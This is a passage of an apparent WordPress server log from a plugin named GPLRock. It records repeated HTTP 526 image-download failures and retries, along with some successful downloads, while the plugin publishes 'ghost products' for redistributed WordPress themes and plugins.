omens-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:09 UTC] GPLRock: Image download failed for product omens-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:11 UTC] GPLRock: Image download failed for product omens-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omens---multipurpose-creative-wordpress-theme-30043.webp for product omens-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:14 UTC] GPLRock WARNING: Image download failed for product omens-multipurpose-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/omens---multipurpose-creative-wordpress-theme-30043.webp [05-Apr-2026 10:03:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: omens-multipurpose-creative-wordpress-theme [05-Apr-2026 10:03:14 UTC] GPLRock: Image download failed for product vilan-corporate-shop-forum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:16 UTC] GPLRock: Image download failed for product vilan-corporate-shop-forum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vilan-corporate-shop--forum-wordpress-theme-15230.webp for product vilan-corporate-shop-forum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:18 UTC] GPLRock: Image download failed for product vilan-corporate-shop-forum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:20 UTC] GPLRock: Image download failed for product vilan-corporate-shop-forum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vilan-corporate-shop--forum-wordpress-theme-15230.webp for product vilan-corporate-shop-forum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:23 UTC] GPLRock WARNING: Image download failed for product vilan-corporate-shop-forum-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vilan-corporate-shop--forum-wordpress-theme-15230.webp [05-Apr-2026 10:03:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vilan-corporate-shop-forum-wordpress-theme [05-Apr-2026 10:03:23 UTC] GPLRock: Image download failed for product chlo-personal-lifestyle-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:25 UTC] GPLRock: Image download failed for product chlo-personal-lifestyle-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chlo---personal-lifestyle-wordpress-blog-theme-31019.webp for product chlo-personal-lifestyle-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:27 UTC] GPLRock: Image download failed for product chlo-personal-lifestyle-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:29 UTC] GPLRock: Image download failed for product chlo-personal-lifestyle-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chlo---personal-lifestyle-wordpress-blog-theme-31019.webp for product chlo-personal-lifestyle-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:31 UTC] GPLRock WARNING: Image download failed for product chlo-personal-lifestyle-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/chlo---personal-lifestyle-wordpress-blog-theme-31019.webp [05-Apr-2026 10:03:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chlo-personal-lifestyle-wordpress-blog-theme [05-Apr-2026 10:03:31 UTC] GPLRock: Image download failed for product zumma-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:34 UTC] GPLRock: Image download failed for product zumma-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zumma---multipurpose-woocommerce-theme-30383.webp for product zumma-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:36 UTC] GPLRock: Image download failed for product zumma-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:38 UTC] GPLRock: Image download failed for product zumma-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zumma---multipurpose-woocommerce-theme-30383.webp for product zumma-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:40 UTC] GPLRock WARNING: Image download failed for product zumma-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/zumma---multipurpose-woocommerce-theme-30383.webp [05-Apr-2026 10:03:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zumma-multipurpose-woocommerce-theme [05-Apr-2026 10:03:40 UTC] GPLRock: Image download failed for product cityrama-listing-city-guide-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:42 UTC] GPLRock: Image download failed for product cityrama-listing-city-guide-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cityrama---listing--city-guide-wordpress-theme-28064.webp for product cityrama-listing-city-guide-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:45 UTC] GPLRock: Image download failed for product cityrama-listing-city-guide-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:47 UTC] GPLRock: Image download failed for product cityrama-listing-city-guide-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cityrama---listing--city-guide-wordpress-theme-28064.webp for product cityrama-listing-city-guide-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:49 UTC] GPLRock WARNING: Image download failed for product cityrama-listing-city-guide-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cityrama---listing--city-guide-wordpress-theme-28064.webp [05-Apr-2026 10:03:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cityrama-listing-city-guide-wordpress-theme [05-Apr-2026 10:03:49 UTC] GPLRock: Image download failed for product venus-news-magazine-blog-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:51 UTC] GPLRock: Image download failed for product venus-news-magazine-blog-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/venus--news-magazine-blog-wordpress-21299.webp for product venus-news-magazine-blog-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:53 UTC] GPLRock: Image download failed for product venus-news-magazine-blog-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:55 UTC] GPLRock: Image download failed for product venus-news-magazine-blog-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:03:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/venus--news-magazine-blog-wordpress-21299.webp for product venus-news-magazine-blog-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:03:57 UTC] GPLRock WARNING: Image download failed for product venus-news-magazine-blog-wordpress. URL: https://meldwp.com/wp-content/uploads/venus--news-magazine-blog-wordpress-21299.webp [05-Apr-2026 10:03:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: venus-news-magazine-blog-wordpress [05-Apr-2026 10:04:47 UTC] GPLRock: Image downloaded successfully for product geodirectory-framework (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-74fa44c0.jpg [05-Apr-2026 10:04:47 UTC] GPLRock: Using pre-downloaded image for product geodirectory-framework: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-74fa44c0.jpg [05-Apr-2026 10:04:47 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-framework [05-Apr-2026 10:04:49 UTC] GPLRock: Image downloaded successfully for product css-igniter-berliner-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fdba9f9.jpg [05-Apr-2026 10:04:49 UTC] GPLRock: Using pre-downloaded image for product css-igniter-berliner-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fdba9f9.jpg [05-Apr-2026 10:04:49 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-berliner-wordpress-theme [05-Apr-2026 10:04:50 UTC] GPLRock: Image downloaded successfully for product firezy-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc6b2e46.jpg [05-Apr-2026 10:04:51 UTC] GPLRock: Using pre-downloaded image for product firezy-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc6b2e46.jpg [05-Apr-2026 10:04:51 UTC] GPLRock: Ghost product published with image - Product ID: firezy-multipurpose-woocommerce-theme [05-Apr-2026 10:04:52 UTC] GPLRock: Image downloaded successfully for product ibid-multi-vendor-auctions-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4206952.jpg [05-Apr-2026 10:04:52 UTC] GPLRock: Using pre-downloaded image for product ibid-multi-vendor-auctions-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4206952.jpg [05-Apr-2026 10:04:52 UTC] GPLRock: Ghost product published with image - Product ID: ibid-multi-vendor-auctions-woocommerce-theme [05-Apr-2026 10:04:54 UTC] GPLRock: Image downloaded successfully for product woocommerce-storefront-powerpack (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ca4294e.jpg [05-Apr-2026 10:04:54 UTC] GPLRock: Using pre-downloaded image for product woocommerce-storefront-powerpack: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ca4294e.jpg [05-Apr-2026 10:04:54 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-storefront-powerpack [05-Apr-2026 10:04:56 UTC] GPLRock: Image downloaded successfully for product fast-wordpress-support-ticket-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-75c55c0e.jpg [05-Apr-2026 10:04:56 UTC] GPLRock: Using pre-downloaded image for product fast-wordpress-support-ticket-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-75c55c0e.jpg [05-Apr-2026 10:04:56 UTC] GPLRock: Ghost product published with image - Product ID: fast-wordpress-support-ticket-plugin [05-Apr-2026 10:04:57 UTC] GPLRock: Image downloaded successfully for product geodirectory-compare-listings (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ee8a617.jpg [05-Apr-2026 10:04:57 UTC] GPLRock: Using pre-downloaded image for product geodirectory-compare-listings: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ee8a617.jpg [05-Apr-2026 10:04:57 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-compare-listings [05-Apr-2026 10:04:59 UTC] GPLRock: Image downloaded successfully for product vinkmag-multi-concept-creative-newspaper-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e80888af.jpg [05-Apr-2026 10:04:59 UTC] GPLRock: Using pre-downloaded image for product vinkmag-multi-concept-creative-newspaper-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e80888af.jpg [05-Apr-2026 10:04:59 UTC] GPLRock: Ghost product published with image - Product ID: vinkmag-multi-concept-creative-newspaper-news-magazine-wordpress-theme [05-Apr-2026 10:05:01 UTC] GPLRock: Image downloaded successfully for product pin-pinterest-style-personal-masonry-blog-front-end-submission (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-204499ce.jpg [05-Apr-2026 10:05:01 UTC] GPLRock: Using pre-downloaded image for product pin-pinterest-style-personal-masonry-blog-front-end-submission: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-204499ce.jpg [05-Apr-2026 10:05:01 UTC] GPLRock: Ghost product published with image - Product ID: pin-pinterest-style-personal-masonry-blog-front-end-submission [05-Apr-2026 10:14:55 UTC] GPLRock: Image download failed for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:14:57 UTC] GPLRock: Image download failed for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:14:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iwp-devtoolz-pro---wordpress-plugin-maker--code-generator-4910.webp for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:14:59 UTC] GPLRock: Image download failed for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:02 UTC] GPLRock: Image download failed for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iwp-devtoolz-pro---wordpress-plugin-maker--code-generator-4910.webp for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:04 UTC] GPLRock WARNING: Image download failed for product iwp-devtoolz-pro-wordpress-plugin-maker-code-generator. URL: https://meldwp.com/wp-content/uploads/iwp-devtoolz-pro---wordpress-plugin-maker--code-generator-4910.webp [05-Apr-2026 10:15:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: iwp-devtoolz-pro-wordpress-plugin-maker-code-generator [05-Apr-2026 10:15:04 UTC] GPLRock: Image download failed for product woocommerce-invoice-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:06 UTC] GPLRock: Image download failed for product woocommerce-invoice-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-invoice-payment-gateway-9160.webp for product woocommerce-invoice-payment-gateway after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:08 UTC] GPLRock: Image download failed for product woocommerce-invoice-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:10 UTC] GPLRock: Image download failed for product woocommerce-invoice-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-invoice-payment-gateway-9160.webp for product woocommerce-invoice-payment-gateway after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:12 UTC] GPLRock WARNING: Image download failed for product woocommerce-invoice-payment-gateway. URL: https://meldwp.com/wp-content/uploads/woocommerce-invoice-payment-gateway-9160.webp [05-Apr-2026 10:15:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-invoice-payment-gateway [05-Apr-2026 10:15:12 UTC] GPLRock: Image downloaded successfully for product woocommerce-gutenberg-block (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-03409e4b.webp [05-Apr-2026 10:15:12 UTC] GPLRock: Using pre-downloaded image for product woocommerce-gutenberg-block: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-03409e4b.webp [05-Apr-2026 10:15:12 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-gutenberg-block [05-Apr-2026 10:15:13 UTC] GPLRock: Image download failed for product woopin-codemypain-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:15 UTC] GPLRock: Image download failed for product woopin-codemypain-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woopin---codemypain--codecanyon-4168.webp for product woopin-codemypain-codecanyon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:17 UTC] GPLRock: Image download failed for product woopin-codemypain-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:19 UTC] GPLRock: Image download failed for product woopin-codemypain-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woopin---codemypain--codecanyon-4168.webp for product woopin-codemypain-codecanyon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:21 UTC] GPLRock WARNING: Image download failed for product woopin-codemypain-codecanyon. URL: https://meldwp.com/wp-content/uploads/woopin---codemypain--codecanyon-4168.webp [05-Apr-2026 10:15:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woopin-codemypain-codecanyon [05-Apr-2026 10:15:21 UTC] GPLRock: Image download failed for product add-on-bundle-for-eform-wordpress-form-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:23 UTC] GPLRock: Image download failed for product add-on-bundle-for-eform-wordpress-form-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/add-on-bundle-for-eform-wordpress-form-builder-32501.webp for product add-on-bundle-for-eform-wordpress-form-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:26 UTC] GPLRock: Image download failed for product add-on-bundle-for-eform-wordpress-form-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:28 UTC] GPLRock: Image download failed for product add-on-bundle-for-eform-wordpress-form-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/add-on-bundle-for-eform-wordpress-form-builder-32501.webp for product add-on-bundle-for-eform-wordpress-form-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:30 UTC] GPLRock WARNING: Image download failed for product add-on-bundle-for-eform-wordpress-form-builder. URL: https://meldwp.com/wp-content/uploads/add-on-bundle-for-eform-wordpress-form-builder-32501.webp [05-Apr-2026 10:15:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: add-on-bundle-for-eform-wordpress-form-builder [05-Apr-2026 10:15:30 UTC] GPLRock: Image download failed for product wp-resizable-multicolor-countdown (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:32 UTC] GPLRock: Image download failed for product wp-resizable-multicolor-countdown (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-resizable-multicolor-countdown-23339.webp for product wp-resizable-multicolor-countdown after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:34 UTC] GPLRock: Image download failed for product wp-resizable-multicolor-countdown (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:36 UTC] GPLRock: Image download failed for product wp-resizable-multicolor-countdown (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-resizable-multicolor-countdown-23339.webp for product wp-resizable-multicolor-countdown after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:38 UTC] GPLRock WARNING: Image download failed for product wp-resizable-multicolor-countdown. URL: https://meldwp.com/wp-content/uploads/wp-resizable-multicolor-countdown-23339.webp [05-Apr-2026 10:15:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-resizable-multicolor-countdown [05-Apr-2026 10:15:39 UTC] GPLRock: Image download failed for product wordpress-posts-layouts-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:41 UTC] GPLRock: Image download failed for product wordpress-posts-layouts-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-posts-layouts-for-wpbakery-page-builder-8770.webp for product wordpress-posts-layouts-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:43 UTC] GPLRock: Image download failed for product wordpress-posts-layouts-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:45 UTC] GPLRock: Image download failed for product wordpress-posts-layouts-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-posts-layouts-for-wpbakery-page-builder-8770.webp for product wordpress-posts-layouts-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:47 UTC] GPLRock WARNING: Image download failed for product wordpress-posts-layouts-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/wordpress-posts-layouts-for-wpbakery-page-builder-8770.webp [05-Apr-2026 10:15:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-posts-layouts-for-wpbakery-page-builder [05-Apr-2026 10:15:47 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-color-image-or-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:49 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-color-image-or-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-color-image-or-button--9861.webp for product woocommerce-variation-swatches-color-image-or-button after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:52 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-color-image-or-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:54 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-color-image-or-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-color-image-or-button--9861.webp for product woocommerce-variation-swatches-color-image-or-button after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:15:56 UTC] GPLRock WARNING: Image download failed for product woocommerce-variation-swatches-color-image-or-button. URL: https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-color-image-or-button--9861.webp [05-Apr-2026 10:15:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-variation-swatches-color-image-or-button [05-Apr-2026 10:15:56 UTC] GPLRock: Image download failed for product save-for-later-with-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:15:58 UTC] GPLRock: Image download failed for product save-for-later-with-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/save-for-later-with-woocommerce-31355.webp for product save-for-later-with-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:16:00 UTC] GPLRock: Image download failed for product save-for-later-with-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:02 UTC] GPLRock: Image download failed for product save-for-later-with-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/save-for-later-with-woocommerce-31355.webp for product save-for-later-with-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:16:04 UTC] GPLRock WARNING: Image download failed for product save-for-later-with-woocommerce. URL: https://meldwp.com/wp-content/uploads/save-for-later-with-woocommerce-31355.webp [05-Apr-2026 10:16:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: save-for-later-with-woocommerce [05-Apr-2026 10:16:05 UTC] GPLRock: Image download failed for product easyplex-movies-live-streaming-tv-series-anime (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:07 UTC] GPLRock: Image download failed for product easyplex-movies-live-streaming-tv-series-anime (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easyplex---movies---live-streaming---tv-series-anime-19365.webp for product easyplex-movies-live-streaming-tv-series-anime after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:16:09 UTC] GPLRock: Image download failed for product easyplex-movies-live-streaming-tv-series-anime (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:11 UTC] GPLRock: Image download failed for product easyplex-movies-live-streaming-tv-series-anime (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:16:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easyplex---movies---live-streaming---tv-series-anime-19365.webp for product easyplex-movies-live-streaming-tv-series-anime after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:16:13 UTC] GPLRock WARNING: Image download failed for product easyplex-movies-live-streaming-tv-series-anime. URL: https://meldwp.com/wp-content/uploads/easyplex---movies---live-streaming---tv-series-anime-19365.webp [05-Apr-2026 10:16:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easyplex-movies-live-streaming-tv-series-anime [05-Apr-2026 10:16:43 UTC] GPLRock: Image downloaded successfully for product privatecontent-premium-plans-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7841fcbb.jpg [05-Apr-2026 10:16:43 UTC] GPLRock: Using pre-downloaded image for product privatecontent-premium-plans-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7841fcbb.jpg [05-Apr-2026 10:16:43 UTC] GPLRock: Ghost product published with image - Product ID: privatecontent-premium-plans-add-on [05-Apr-2026 10:16:45 UTC] GPLRock: Image downloaded successfully for product mythemeshop-dotmag-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5fae5a4.jpg [05-Apr-2026 10:16:45 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-dotmag-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5fae5a4.jpg [05-Apr-2026 10:16:45 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-dotmag-wordpress-theme [05-Apr-2026 10:16:46 UTC] GPLRock: Image downloaded successfully for product give-americloud-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f081c43e.jpg [05-Apr-2026 10:16:46 UTC] GPLRock: Using pre-downloaded image for product give-americloud-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f081c43e.jpg [05-Apr-2026 10:16:46 UTC] GPLRock: Ghost product published with image - Product ID: give-americloud-payments [05-Apr-2026 10:16:48 UTC] GPLRock: Image downloaded successfully for product css-igniter-hugo-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9033cca5.jpg [05-Apr-2026 10:16:48 UTC] GPLRock: Using pre-downloaded image for product css-igniter-hugo-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9033cca5.jpg [05-Apr-2026 10:16:48 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-hugo-woocommerce-theme [05-Apr-2026 10:16:50 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-eu-energy-label-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbbcd444.jpg [05-Apr-2026 10:16:50 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-eu-energy-label-premium: 